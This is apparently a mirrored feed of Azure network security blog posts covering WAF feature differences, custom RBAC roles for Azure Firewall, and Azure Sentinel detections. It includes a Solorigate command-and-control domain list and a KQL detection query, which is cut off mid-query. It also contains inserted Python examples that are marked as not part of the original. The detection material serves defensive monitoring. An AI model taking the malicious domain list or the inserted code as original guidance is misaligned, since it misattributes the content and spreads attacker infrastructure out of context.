style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Custom Rules with Geo-Location&nbsp;support</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Custom Rules with Rate-Limiting support</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P 
style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Per-Website WAF Policy&nbsp;</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> </TR> <TR> <TD style="width: 46.86%; border: solid black 1.0pt; border-top: none; padding: 0in 0in 0in 0in;"> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Per-URI WAF Policy&nbsp;</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 32.38%; border-top: none; border-left: none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Available</STRONG></SPAN></SPAN></P> </TD> <TD style="width: 20.76%; border-top: none; border-left: 
none; border-bottom: solid black 1.0pt; border-right: solid black 1.0pt; padding: 0in 0in 0in 0in;"> <P style="text-align: center;"><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Unavailable</SPAN></SPAN></P> </TD> </TR> </TBODY> </TABLE> <P><SPAN style="font-size: 20px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>&nbsp;</STRONG></SPAN></SPAN></P> <P><SPAN style="font-size: 20px;"><STRONG><SPAN style="font-family: Calibri, sans-serif;">Are there other key differences worth mentioning?</SPAN></STRONG></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">Here are a few more things to consider:</SPAN></SPAN></P> <P>&nbsp;</P> <UL> <LI><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Rule actions for custom rules:</STRONG> In a WAF policy for Azure Front Door, rule actions can be set to <A href="#" target="_blank" rel="noopener">Allow, Deny, Log or Redirect</A>. In a WAF policy for Azure Application Gateway, rule actions can be set to <A href="#" target="_blank" rel="noopener">Allow, Block or Log</A>. Redirect is not an available rule action for the latter.</SPAN></SPAN><BR /><BR /></LI> <LI><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Rule actions for managed rules:</STRONG> In a WAF policy for Azure Front Door, rule actions can be set to <A href="#" target="_blank" rel="noopener">Allow, Deny, Log or Redirect</A>. In a WAF policy for Azure Application Gateway, rules can be either <A href="#" target="_blank" rel="noopener">enabled or disabled</A>. It is not possible to change the rule action.</SPAN></SPAN><BR /><BR /></LI> <LI><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Types of custom rules:</STRONG> In a WAF policy for Azure Front Door, you can create custom rules based on <A href="#" target="_blank" rel="noopener">Match type or Rate Limit type</A>. 
Rate-limiting custom rules allow you to respond to abnormally high traffic from any given source IP, based on a customized quantity of web requests within a time frame. In a WAF policy for Azure Application Gateway, you can configure <A href="#" target="_blank" rel="noopener">Match type</A> custom rules, and rate-limiting type is not available.</SPAN></SPAN><BR /><BR /></LI> <LI><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;"><STRONG>Exclusion lists:</STRONG> In a WAF policy for Azure Front Door, you can create <A href="#" target="_blank" rel="noopener">exclusion lists at a rule level, at a rule group level, and at a rule set level.</A> You can apply exclusions for matches on <A href="#" target="_blank" rel="noopener">request header name, request cookie name, query string args name and request body post args name</A>, and the exclusions can be applied to specific rules, rule groups or rule sets. In a WAF policy for Azure Application Gateway, the exclusions are a global setting. This means the exclusions will apply to all active rules within the scope of your WAF policy. You can apply exclusions for matches on <A href="#" target="_blank" rel="noopener">request header name, request cookie name and request args name</A>. You could alternatively apply a dedicated WAF policy at different association levels in your Azure Application Gateway, using <A href="#" target="_blank" rel="noopener">per-site WAF policy</A> or <A href="#" target="_blank" rel="noopener">per-URI WAF policy</A>.</SPAN></SPAN></LI> </UL> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">&nbsp;</SPAN></SPAN></P> <P><SPAN style="font-size: 17px;"><SPAN style="font-family: Calibri, sans-serif;">In this article, we provided a snapshot of the current Azure WAF feature set. We’d love to hear more from you. 
Feel free to leave comments below or let us know more about new features you need in our <A href="#" target="_blank" rel="noopener">Microsoft Azure Feedback</A> forum.</SPAN></SPAN></P> Mon, 19 Apr 2021 13:43:37 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-web-application-firewall-waf-config-versus-waf-policy/ba-p/2270525 camilamartins 2021-04-19T13:43:37Z Role Based Access Control for Azure Firewall https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/role-based-access-control-for-azure-firewall/ba-p/2245598 <P>Network security requirements involve providing limited access and granting administrative permissions to users within a network. Role assignments are the way you control access to Azure back end and infrastructure resources. If the <A href="#" target="_self">built-in roles</A>&nbsp;do not meet the specific needs of your organization, Azure Role Based Access Control (RBAC) allows account owners to create <A href="#" target="_self">custom roles</A>&nbsp; that an administrator can assign to Users/User groups.</P> <P>You can <A href="#" target="_self">configure role assignments</A>&nbsp;after you have defined the scope, either via Azure Portal, PowerShell, CLI or RestAPI.</P> <P class="lia-indent-padding-left-420px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_1-1617147303683.png" style="width: 200px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/268393i840B3551CBBD1EE4/image-size/small?v=v2&amp;px=200" role="button" title="tobio_1-1617147303683.png" alt="tobio_1-1617147303683.png" /></span></P> <P>In some instances, the built-in roles may be either too permissive or insufficient for the assignment that is required. Access should be provided using the principle of least privilege and every role should be carefully created with the user’s duties in mind, as a security control when creating user privileges. 
In this situation, you will also need to know what role actions are available.<BR /><BR /></P> <P>In this article, we discuss the actions that may be used to create security-conscious roles and templates that you can use to create and assign roles for Azure Firewall. Once you understand the boundaries for the role you are trying to create, you can use the template below or modify it by carefully selecting the actions required and assigning it to the user.</P> <P>There are various levels of administrative roles you might be looking to assign, and this may be done at a management group level, subscription level, resource group level or resource level. Azure RBAC focuses on managing user <A href="#" target="_self">actions</A> at these different scopes. <BR /><BR /></P> <P>To create a custom role, you must provide the following input.</P> <P>&nbsp;</P> <LI-CODE lang="json">{ "DisplayName": "", "Description": "", "Actions": [ ], "NotActions": [ ], "DataActions": [ ], "NotDataActions": [ ], "AssignableScopes": [ ] }</LI-CODE> <P>&nbsp;</P> <P>You can find the description of each requirement above in this <A href="#" target="_self">article</A>. To configure Azure roles using PowerShell, follow the steps to <A href="#" target="_self">create a custom role</A>.</P> <P>Click the “Deploy to Azure” button below to deploy a template from GitHub for the Network infrastructure role discussed below. You can use this custom template by editing the “action” field with the appropriate set of actions from the samples below. Then provide the Principal ID (Object ID) of the user to assign the role. 
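</P>
<P>A least-privilege check for a custom role built from the input skeleton above, as an added example that is not part of the original article or its GitHub template. It uses the article's Firewall Security Reader actions; the function names, the finding labels, the placeholder subscription ID and resource group, the rule that scopes broader than a resource group are flagged, and the case-insensitive comparison of action names are assumptions of this example.</P>

```python
# Added example: lint a custom Azure role definition for least privilege.
# Keys follow the article's input skeleton; finding labels are this example's own.

ROLE_KEYS = ("DisplayName", "Description", "Actions", "NotActions",
             "DataActions", "NotDataActions", "AssignableScopes")

# Actions copied from the article's "Firewall Security Reader" sample,
# including the two entries that appear twice there.
READER_ACTIONS = [
    "Microsoft.Network/azurefirewalls/read",
    "Microsoft.Network/azureFirewallFqdnTags/read",
    "Microsoft.Network/azureFirewalls/applicationRuleCollections/read",
    "Microsoft.Network/azureFirewalls/natRuleCollections/read",
    "Microsoft.Network/azureFirewalls/networkRuleCollections/read",
    "Microsoft.Resources/subscriptions/resourceGroups/read",
    "Microsoft.Network/firewallPolicies/ruleCollectionGroups/read",
    "Microsoft.Network/virtualNetworks/read",
    "Microsoft.Network/firewallPolicies/read",
    "Microsoft.Network/firewallPolicies/ruleCollectionGroups/read",
    "Microsoft.Resources/subscriptions/resourceGroups/read",
]

# Placeholder scope values (constructed, not from the article).
SUBSCRIPTION = "/subscriptions/00000000-0000-0000-0000-000000000000"
RESOURCE_GROUP = SUBSCRIPTION + "/resourceGroups/rg-firewall-example"


def make_role(name, description, actions, scopes):
    """Fill in the article's skeleton; lists the role does not use stay empty."""
    return {
        "DisplayName": name,
        "Description": description,
        "Actions": list(actions),
        "NotActions": [],
        "DataActions": [],
        "NotDataActions": [],
        "AssignableScopes": list(scopes),
    }


def dedupe_actions(actions):
    """Drop repeated actions, keeping first occurrences in order."""
    seen, unique = set(), []
    for action in actions:
        if action.lower() not in seen:  # assumption: names compare case-insensitively
            seen.add(action.lower())
            unique.append(action)
    return unique


def lint_role(role, read_only=False):
    """Return (label, value) findings for a role definition dict."""
    findings = [("missing-key", key) for key in ROLE_KEYS if key not in role]
    seen = set()
    for action in role.get("Actions", []):
        norm = action.lower()
        if norm in seen:
            findings.append(("duplicate", action))
            continue
        seen.add(norm)
        verb = norm.rsplit("/", 1)[-1]
        if "*" in norm:
            # A wildcard grants every operation under the prefix, writes included.
            findings.append(("wildcard", action))
        elif read_only and verb != "read":
            findings.append(("not-read", action))
    scopes = role.get("AssignableScopes", [])
    if not scopes:
        findings.append(("no-scope", "AssignableScopes"))
    for scope in scopes:
        parts = [p for p in scope.split("/") if p]
        # Resource group scope has 4 path segments; anything shorter is broader.
        if not len(parts) >= 4:
            findings.append(("broad-scope", scope))
    return findings


def audit_samples():
    """Lint the article's reader list and a constructed role that has drifted."""
    reader = make_role("Example - Firewall Security Reader", "Read-only auditor",
                       READER_ACTIONS, [RESOURCE_GROUP])
    drifted = make_role(
        "Example - Drifted Reader", "Reader that picked up extra rights",
        ["Microsoft.Network/azureFirewalls/read",
         "Microsoft.Network/azureFirewalls/networkRuleCollections/write",
         "Microsoft.Support/*"],
        [SUBSCRIPTION])
    return {"reader": lint_role(reader, read_only=True),
            "drifted": lint_role(drifted, read_only=True)}


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(name, findings)
```

<P>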
You can find a detailed <A href="#" target="_self">step by step guide here</A>.</P> <P>&nbsp;</P> <P class="lia-indent-padding-left-360px"><A title="Deploy to Azure" href="#" target="_blank" rel="noopener"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="tobio_1-1617144867781.png" style="width: 171px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/268390i43D583B561E4554F/image-dimensions/171x41?v=v2" width="171" height="41" role="button" title="tobio_1-1617144867781.png" alt="tobio_1-1617144867781.png" /></span></A></P> <P class="lia-indent-padding-left-360px">&nbsp;</P> <P><STRONG>The following 3 administrator examples are common in network scenarios:</STRONG></P> <P>&nbsp;</P> <P><FONT color="#333399"><EM>Firewall Security Administrator</EM></FONT><BR />This role is assigned to an admin that is responsible for the security configurations in the network. Access control is used to manage connectivity, making sure actions are carefully assigned. 
This admin can analyze the security risk of each connection via the network and application rules and make changes as required.</P> <P>&nbsp;</P> <LI-CODE lang="applescript">"Microsoft.Network/azureFirewalls/networkRuleCollections/delete", "Microsoft.Network/azurefirewalls/write", "Microsoft.Network/azureFirewalls/applicationRuleCollections/write", "Microsoft.Network/azureFirewalls/applicationRuleCollections/delete", "Microsoft.Network/azureFirewalls/natRuleCollections/write", "Microsoft.Network/azureFirewalls/natRuleCollections/delete", "Microsoft.Network/azureFirewalls/networkRuleCollections/write", "Microsoft.Network/azureFirewalls/networkRuleCollections/delete", "Microsoft.Resources/deployments/*", "Microsoft.Network/firewallPolicies/ruleCollectionGroups/write", "Microsoft.Network/firewallPolicies/read", "Microsoft.Resources/subscriptions/resourceGroups/read", "Microsoft.Insights/alertRules/*", "Microsoft.Resources/subscriptions/resourceGroups/*", "Microsoft.Support/*"</LI-CODE> <P>&nbsp;</P> <P><FONT color="#333399"><EM>Firewall Security Reader</EM></FONT><BR />This administrator requires mostly reader privileges, as may be required in an auditor role. The permission grants visibility into existing rules and other properties of the firewall. 
This user is therefore only able to view and cannot make changes.</P> <P>&nbsp;</P> <LI-CODE lang="applescript">"Microsoft.Network/azurefirewalls/read", "Microsoft.Network/azureFirewallFqdnTags/read", "Microsoft.Network/azureFirewalls/applicationRuleCollections/read", "Microsoft.Network/azureFirewalls/natRuleCollections/read", "Microsoft.Network/azureFirewalls/networkRuleCollections/read", "Microsoft.Resources/subscriptions/resourceGroups/read", "Microsoft.Network/firewallPolicies/ruleCollectionGroups/read", "Microsoft.Network/virtualNetworks/read", "Microsoft.Network/firewallPolicies/read", "Microsoft.Network/firewallPolicies/ruleCollectionGroups/read", "Microsoft.Resources/subscriptions/resourceGroups/read"</LI-CODE> <P>&nbsp;</P> <P><FONT color="#333399"><EM>Network Infrastructure administrator</EM></FONT><BR />This role has more overarching rights to change the infrastructure of the firewall from a network operations perspective, but would not necessarily need access to change network and application rules like the security admin, hence viewer access. 
Permissions in this role include <A href="#" target="_self">FirewallPolicies</A>&nbsp;attributes such as Threat Intelligence, DNS settings, Intrusion detection, etc.&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="applescript">"Microsoft.Network/azurefirewalls/delete", "Microsoft.Network/azureFirewalls/networkRuleCollections/read", "Microsoft.Network/azurefirewalls/read", "Microsoft.Network/azureFirewalls/applicationRuleCollections/read", "Microsoft.Network/azureFirewalls/applicationRuleCollections/read", "Microsoft.Network/azureFirewalls/natRuleCollections/read", "Microsoft.Network/azureFirewalls/natRuleCollections/read", "Microsoft.Network/azureFirewalls/networkRuleCollections/read", "Microsoft.Network/azureFirewalls/networkRuleCollections/read", "Microsoft.Network/firewallPolicies/*", "Microsoft.Network/ipGroups/*", "Microsoft.Resources/deployments/*", "Microsoft.Insights/alertRules/*", "Microsoft.Resources/subscriptions/resourceGroups/read", "Microsoft.Support/*", "Microsoft.Resources/subscriptions/resourceGroups/*"</LI-CODE> <P>&nbsp;</P> <P>To remove the example role when done, use the following command in PowerShell:</P> <P>&nbsp;</P> <LI-CODE lang="applescript">Remove-AzRoleDefinition -Name "Custom Role - Firewall InfraAdmin"</LI-CODE> <P>&nbsp;</P> <P><FONT color="#333399"><STRONG>Note</STRONG></FONT>: You may need the subscription owner permission if this is the first time an Azure Firewall instance is deployed in that subscription. This can also be achieved by registering the provider: Microsoft.ContainerService before creating the firewall.</P> <P>&nbsp;</P> <P><FONT size="3"><EM>Role Definitions use a GUID for the name; this must be unique for every role assignment on the group. </EM></FONT><BR /><FONT size="3"><EM>The roleDefName parameter is used to seed the guid() function with this value; change it for each deployment. 
</EM></FONT><BR /><FONT size="3"><EM>You can supply a GUID or any string, as long as it has not been used before when assigning the role to the resourceGroup.</EM></FONT></P> Wed, 31 Mar 2021 18:19:12 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/role-based-access-control-for-azure-firewall/ba-p/2245598 tobiotolorin 2021-03-31T18:19:12Z New Detections for Azure Firewall in Azure Sentinel https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-detections-for-azure-firewall-in-azure-sentinel/ba-p/2244958 <H2>&nbsp;</H2> <P>Written in collaboration with&nbsp;<LI-USER uid="419776"></LI-USER>&nbsp;(Program Manager&nbsp;<SPAN>CxE Azure Sentinel Team)</SPAN></P> <P>&nbsp;</P> <H2>Introduction</H2> <P>&nbsp;</P> <P><A href="#" target="_blank" rel="noopener"><SPAN>Recent attacks</SPAN></A><SPAN>&nbsp;highlight the fact that,&nbsp;in addition to implementing appropriate security&nbsp;protection controls to defend against malicious adversaries, continuous monitoring and response is a top priority for every organization.</SPAN><SPAN>&nbsp; To implement security&nbsp;monitoring and response from a networking perspective,&nbsp;you need visibility into traffic traversing your network devices and detection logic to identify malicious patterns in the network traffic.&nbsp; This is a critical piece for every infrastructure/network security process.&nbsp;</SPAN></P> <P>&nbsp;</P> <P>Readers of this post will hopefully be familiar with both Azure Firewall, which provides protection against network-based threats, and Azure Sentinel, which provides SIEM and SOAR (security orchestration, automation, and response) capabilities.&nbsp; In this blog, we will discuss the new detections for Azure Firewall in Azure Sentinel.&nbsp; These new detections allow security teams to get Sentinel alerts if machines on the internal network attempt to query/connect to domain names or IP addresses on the internet that are associated with known IOCs, as defined 
in the detection rule query.&nbsp; True positive detections should be considered as Indicators of Compromise (IOCs).&nbsp; Security incident response teams can then perform response and appropriate remediation actions based on these detection signals.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>Scenario</H2> <P>&nbsp;</P> <P>In case of an attack, after breaching through the boundary defenses, a malicious adversary may utilize malware and/or malicious code for persistence, command-and-control, and data exfiltration.&nbsp; When malware or malicious code is running on machines on the internal network, in most cases, it will attempt to make outbound connections for command-and-control updates, and to exfiltrate data to adversary servers through the internet.&nbsp; When this happens, traffic will inevitably flow out through the network egress points where it will be processed and logged by the devices, or ideally a firewall, controlling internet egress.&nbsp; The data logged by devices/firewalls processing internet egress traffic can be analyzed to detect traffic patterns suggesting/representing command-and-control or exfiltration activities (also called IOCs or Indicators of Compromise). 
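</P>
<P>The log analysis described above, as an added example that is not part of the original post or of the Azure Sentinel rule: it parses Azure Firewall DNS proxy and application rule messages and reports internal clients that queried or connected to listed domains. The sample log lines are constructed, the message layouts and function names are assumptions of this example, the three domains are a subset of the Solorigate list in this post, and matching is on whole domain labels, which is stricter than a substring test.</P>

```python
import re

# Subset of the Solorigate domains declared in this post's rule query.
IOC_DOMAINS = frozenset({"avsvmcloud.com", "databasegalore.com", "deftsecurity.com"})

# Assumed msg_s layouts for two Azure Firewall log categories (IPv4 clients only).
# Each entry: (regex, client group, hostname group, action group or None).
PATTERNS = {
    "AzureFirewallDnsProxy": (
        re.compile(r"^DNS Request: ([0-9.]+):(\d+) - (\d+) (\S+) (\S+) (\S+?)\. "),
        1, 6, None),
    "AzureFirewallApplicationRule": (
        re.compile(r"^(\S+) request from ([0-9.]+):(\d+) ?to ([^\s:]+):(\d+)\. "
                   r"Action: ?(\w+)"),
        2, 4, 6),
}

# Constructed (category, msg_s) records; none of these lines come from a real log.
SAMPLE_RECORDS = [
    ("AzureFirewallDnsProxy",
     "DNS Request: 10.0.1.4:53211 - 4711 A IN appsync-api.eu-west-1.avsvmcloud.com. "
     "udp 60 false 512 NOERROR qr,rd,ra 120 0.004s"),
    # Look-alike name: contains an IOC string but is a different domain.
    ("AzureFirewallDnsProxy",
     "DNS Request: 10.0.1.9:40100 - 4712 A IN notavsvmcloud.com. "
     "udp 35 false 512 NOERROR qr,rd,ra 80 0.003s"),
    ("AzureFirewallApplicationRule",
     "HTTPS request from 10.0.2.7:50122 to www.databasegalore.com:443. "
     "Action: Deny. No rule matched. Proceeding with default action"),
    # IOC string used as a prefix of an unrelated domain.
    ("AzureFirewallApplicationRule",
     "HTTP request from 10.0.2.8:50500 to deftsecurity.com.example.org:80. "
     "Action: Allow. Rule Collection: web-out. Rule: allow-example"),
    # Truncated message: counted as skipped so parser drift stays visible.
    ("AzureFirewallDnsProxy", "DNS Request: truncated"),
    # Category this example does not inspect.
    ("AzureFirewallNetworkRule",
     "TCP request from 10.0.2.9:51000 to 203.0.113.10:443. Action: Allow"),
]


def matches_ioc(hostname, iocs=IOC_DOMAINS):
    """Return the IOC domain that hostname equals or is a subdomain of, else None."""
    labels = hostname.lower().rstrip(".").split(".")
    for start in range(len(labels)):
        candidate = ".".join(labels[start:])
        if candidate in iocs:
            return candidate
    return None


def detect(records, iocs=IOC_DOMAINS):
    """Return (hits, skipped): IOC matches and the count of unparseable messages."""
    hits, skipped = [], 0
    for category, message in records:
        if category not in PATTERNS:
            continue
        regex, client_g, host_g, action_g = PATTERNS[category]
        match = regex.match(message)
        if match is None:
            skipped += 1
            continue
        host = match.group(host_g)
        ioc = matches_ioc(host, iocs)
        if ioc:
            hits.append({
                "category": category,
                "client": match.group(client_g),  # internal host to investigate
                "name": host,
                "ioc": ioc,
                # Allow versus Deny tells triage whether the connection got out.
                "action": match.group(action_g) if action_g else None,
            })
    return hits, skipped


if __name__ == "__main__":
    found, unparsed = detect(SAMPLE_RECORDS)
    for hit in found:
        print(hit)
    print("unparsed messages:", unparsed)
```

<P>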
This is the basis of network-based detections discussed in this blog.</P> <P>&nbsp;</P> <P>When customers use Azure Firewall for controlling their internet egress, Azure Firewall will log all outbound traffic and DNS query traffic if configured as a <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/enabling-central-visibility-for-dns-using-azure-firewall-custom/ba-p/2156331" target="_blank" rel="noopener">DNS Proxy</A>, to the defined Log Analytics workspace.&nbsp; If a customer is also using Azure Sentinel, they can ingest log data produced by Azure Firewall and run built-in or custom Analytic Rules templates on this data to identify malicious traffic patterns representing IOCs, that these rules are defined to detect.&nbsp; These rules can be configured to run on a schedule and create an incident (or perform an automated action) in Azure Sentinel when there is a match.&nbsp; These incidents can then be triaged by the SOC for response and remediation.</P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>What’s New</H2> <P>&nbsp;</P> <P>Up until now, there were only a couple of Analytic Rule based detections for Azure Firewall available in Azure Sentinel.&nbsp; We are excited to announce availability of <STRONG>eight&nbsp;new detections</STRONG> for well-known IOCs in Azure Sentinel based on traffic patterns flowing through the Azure Firewall.&nbsp; The table below provides a list of new detections which have been added recently and are available to you at the time of publishing this blog.</P> <P>&nbsp;</P> <TABLE class="lia-align-left" style="height: 489px; width: 80%; border-style: dashed;" border="1" width="80%"> <TBODY> <TR> <TD width="40px" class="lia-align-center"><STRONG><FONT size="4">No.</FONT></STRONG></TD> <TD width="300px" height="40px"><STRONG><FONT size="4">Sentinel Analytic Rule Name</FONT></STRONG></TD> <TD width="300px" height="40px"><STRONG><FONT size="4">Sentinel Repo Link</FONT></STRONG></TD> </TR> <TR> <TD width="40px" 
class="lia-align-center"> <P>1.&nbsp;</P> </TD> <TD width="158px" height="30px"> <P>Solorigate&nbsp;Network Beacon&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/Solorigate-Network-Beacon.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>2.</P> </TD> <TD width="158px" height="30px"> <P>Known GALLIUM domains and hashes&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/GalliumIOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>3.</P> </TD> <TD width="158px" height="30px"> <P>Known IRIDIUM&nbsp;IP&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/IridiumIOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>4.</P> </TD> <TD width="158px" height="30px"> <P>Known Phosphorus group domains/IP&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/PHOSPHORUSMarch2019IOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>5.</P> </TD> <TD width="158px" height="30px"> <P>THALLIUM domains included in&nbsp;DCU&nbsp;takedown&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/ThalliumIOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>6.</P> </TD> <TD width="158px" height="30px"> <P>Known ZINC related&nbsp;maldoc&nbsp;hash&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/ZincJan272021IOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>7.</P> </TD> <TD width="158px" height="30px"> <P>Known STRONTIUM group domains&nbsp;</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">Azure-Sentinel/STRONTIUMJuly2019IOCs.yaml</A></P> </TD> </TR> <TR> <TD width="40px" class="lia-align-center"> <P>8.</P> </TD> <TD width="158px" height="30px"> 
<P>NOBELIUM - Domain and IP IOCs - March 2021</P> </TD> <TD width="325px"> <P><A href="#" target="_blank" rel="noopener">NOBELIUM_DomainIOCsMarch2021.yaml </A></P> </TD> </TR> </TBODY> </TABLE> <H2>&nbsp;</H2> <P>The screenshot below shows the new Azure Firewall detections in the Azure Sentinel Analytic Rule blade.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="2021-03-30 10_20_56-Azure Sentinel - Microsoft Azure and 10 more pages - Work - Microsoft​ Edge.jpg" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/268290i4B38E0423B68C1A4/image-size/large?v=v2&amp;px=999" role="button" title="2021-03-30 10_20_56-Azure Sentinel - Microsoft Azure and 10 more pages - Work - Microsoft​ Edge.jpg" alt="Azure Firewall Detection Rules in Azure Sentinel" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">Azure Firewall Detection Rules in Azure Sentinel</span></span></P> <H2>&nbsp;</H2> <P>&nbsp;</P> <H2>How Network-Based Detections Work</H2> <P>&nbsp;</P> <P>To understand how these detections work, we will examine the “Solorigate Network Beacon” detection, which indicates a compromise associated with the SolarWinds exploit.&nbsp; The query snippet below identifies communication to domains involved in this incident.</P> <P>&nbsp;</P> <OL> <LI>We start by declaring all the domains that we want to find in the client request from the internal network</LI> </OL> <P>&nbsp;</P> <LI-CODE lang="javascript">let domains = dynamic(["incomeupdate.com","zupertech.com","databasegalore.com","panhardware.com","avsvmcloud.com","digitalcollege.org","freescanonline.com","deftsecurity.com","thedoccloud.com","virtualdataserver.com","lcomputers.com","webcodez.com","globalnetworkissues.com","kubecloud.com","seobundlekit.com","solartrackingsystem.net","virtualwebdata.com"]);</LI-CODE> <P>&nbsp;</P> <OL start="2"> <LI>Then we perform a union to look for traffic destined for these 
domains in data from multiple sources which include Common Security Log (CEF), DNS Events, VM Connection, Device Network Events, <STRONG>Azure Firewall DNS Proxy</STRONG>, and <STRONG>Azure Firewall Application Rule</STRONG> logs</LI> </OL> <P>&nbsp;</P> <LI-CODE lang="javascript">(union isfuzzy=true (CommonSecurityLog | parse .. ), (DnsEvents | parse .. ), (VMConnection |parse .. ), (DeviceNetworkEvents | parse .. ), (AzureDiagnostics | where ResourceType == "AZUREFIREWALLS" | where Category == "AzureFirewallDnsProxy" | parse msg_s with "DNS Request: " ClientIP ":" ClientPort " - " QueryID " " Request_Type " " Request_Class " " Request_Name ". " Request_Protocol " " Request_Size " " EDNSO_DO " " EDNS0_Buffersize " " Responce_Code " " Responce_Flags " " Responce_Size " " Response_Duration | where Request_Name has_any (domains) | extend DNSName = Request_Name | extend IPCustomEntity = ClientIP ), (AzureDiagnostics | where ResourceType == "AZUREFIREWALLS" | where Category == "AzureFirewallApplicationRule" | parse msg_s with Protocol 'request from ' SourceHost ':' SourcePort 'to ' DestinationHost ':' DestinationPort '. 
